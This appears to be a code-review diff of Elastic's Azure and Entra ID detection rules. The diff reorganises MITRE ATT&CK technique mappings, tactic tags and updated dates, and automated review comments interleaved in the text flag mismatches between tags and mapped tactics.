diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml index 48d7a122d65..e394d39c999 100644 --- a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml +++ b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] 
@@ -89,39 +89,39 @@ event.dataset: "azure.activitylogs" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml index 507a7129a7e..1ef19b65dbd 100644 --- a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml +++ b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] @@ -65,7 +65,18 @@ references = [ risk_score = 47 rule_id = "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra Audit Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -95,18 +106,31 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml index 9568883df81..9ea2a42f57b 100644 --- a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
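Review bot: Dropping T1550.001 (Application Access Token) leaves a rule about actor-token user impersonation without the technique that describes token abuse, while T1548 is added under Privilege Escalation with no sub-technique and a stray blank line now sits before its `[rule.threat.tactic]` table. Expressing initial access and escalation does not require removing the Defense Evasion entry; it can be retained alongside the two new entries. The tags hunk above already removed `"Tactic: Defense Evasion"`, so restoring the mapping means restoring that tag too.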
@@ -25,7 +25,14 @@ setup = """ This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. """ severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -76,30 +83,19 @@ Entra ID Device Code Authentication allows users to authenticate devices using a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" 
@@ -109,3 +105,20 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml index eb88bf1eec5..09ce8630b50 100644 --- a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml +++ b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/governance/policy/samples/ risk_score = 21 rule_id = "141e9b3a-ff37-4756-989d-05d7cbf35b0e" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
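Review bot: This hunk re-adds a Defense Evasion entry (T1550.001) to the device-code/broker rule, but the tags hunk in the same file (`@@ -25,7 +25,14 @@`) removed `"Tactic: Defense Evasion"`, so the tags no longer list every mapped tactic. Either restore `"Tactic: Defense Evasion",` next to `"Tactic: Initial Access",` in the tags list, or drop this entry if Defense Evasion was meant to go away. The earlier threat hunk's addition of T1566.002 (Spearphishing Link) under Initial Access fits device-code phishing and is already covered by the existing Initial Access tag.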
@@ -78,18 +78,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite externa [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml index 9db32da37e9..61dc6a1a52f 100644 --- a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
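Review bot: The new mapping lists bare T1078 (Valid Accounts) twice — once under Initial Access and again under Persistence — with no sub-technique, while the tags hunk above keeps only `"Tactic: Initial Access"`, so the Persistence entry has no matching tag. Inviting an external guest creates a new cloud account, which is exactly what the removed T1136.003 (Create Account: Cloud Account) described; I'd keep that as the Persistence technique with `"Tactic: Persistence",` back in the tags, and use `id = "T1078.004"` (Cloud Accounts) as the sub-technique of the Initial Access entry rather than repeating the parent technique in both places.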
@@ -79,7 +79,18 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs To use this rule, ensure that Microsoft Entra ID Sign-In Logs are being collected and streamed into the Elastic Stack via the Azure integration. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -97,34 +108,40 @@ event.dataset: "azure.signinlogs" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml index de672c91aaf..6ff9e5edd71 100644 --- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/26" [rule] author = ["Elastic", "Matteo Potito Giorgio"] 
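Review bot: The tags hunk above adds `"Tactic: Persistence"`, but this hunk maps only Initial Access (T1078.004) and Defense Evasion (T1550.001); there is no Persistence entry, so the tag is orphaned. Either add a Persistence `[[rule.threat]]` entry with the technique the rule is meant to cover, or remove `"Tactic: Persistence",` from the tags.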
@@ -107,31 +107,30 @@ event.dataset:(azure.activitylogs or azure.signinlogs) [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml index 7d8818d01ac..67c5edccbc2 100644 --- a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml +++ b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/08" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -72,7 +72,21 @@ setup = """#### Required Microsoft Entra ID Sign-In and Graph Activity Logs This rule requires the Microsoft Entra ID Sign-In Logs and Microsoft Graph Activity Logs integration to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Domain: API", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Domain: API", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Tactic: Defense Evasion", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "esql" 
@@ -176,23 +190,36 @@ from logs-azure.signinlogs-*, logs-azure.graphactivitylogs-* metadata _id, _vers [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml index f7d9735ba39..fd3737f9131 100644 --- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
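Review bot: Removing T1550.004 (Web Session Cookie) takes away the sub-technique that most directly describes a single Graph session being reused from several addresses; T1550.001 alone implies a bearer token rather than a session. Unless the detection logic changed, I'd keep both sub-techniques under the Defense Evasion entry. The added Initial Access entry (T1078.004) and the new `"Tactic: Initial Access"` tag in the hunk above are consistent with each other.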
@@ -65,7 +65,16 @@ references = [ risk_score = 47 rule_id = "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Credential Access", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -82,34 +91,34 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml index 349868f15fa..84bf8f56d93 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/17" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/20" [rule] author = ["Elastic"] 
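Review bot: The Persistence entry (T1098.001, Additional Cloud Credentials) is dropped here and `"Tactic: Persistence"` is dropped from the tags in the hunk above, which is internally consistent, but an illicit consent grant is a well-known persistence mechanism — the granted permissions survive a password reset — so losing that mapping weakens this rule's ATT&CK coverage. If the removal is deliberate, a sentence in the PR description explaining it would help; otherwise keep the Persistence entry and tag alongside the new Initial Access mapping.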
@@ -139,34 +139,44 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml index 102f666f4aa..d8d3ad94d2c 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/24" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ references = [ risk_score = 47 rule_id = "14fa0285-fe78-4843-ac8e-f4b481f49da9" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-in Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "query" 
@@ -131,31 +139,41 @@ event.outcome: "success" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml index b650e686492..f21da0d5140 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/03" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/15" [rule] author = ["Elastic"] 
@@ -131,21 +131,44 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[[rule.threat.technique]] +id = "T1656" +name = "Impersonation" +reference = "https://attack.mitre.org/techniques/T1656/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name", "azure.signinlogs.properties.app_id"] diff --git a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml index eb4ef151eb7..470aa856ca8 100644 --- a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml +++ b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
@@ -90,18 +90,36 @@ event.dataset:azure.signinlogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml index 38af402e39f..9d467e9edc0 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/29" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] 
@@ -78,7 +78,17 @@ To use this rule, ensure that Microsoft Entra ID Protection logs are being colle For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Use Case: Risk Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Use Case: Risk Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -112,17 +122,40 @@ value = "low" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" 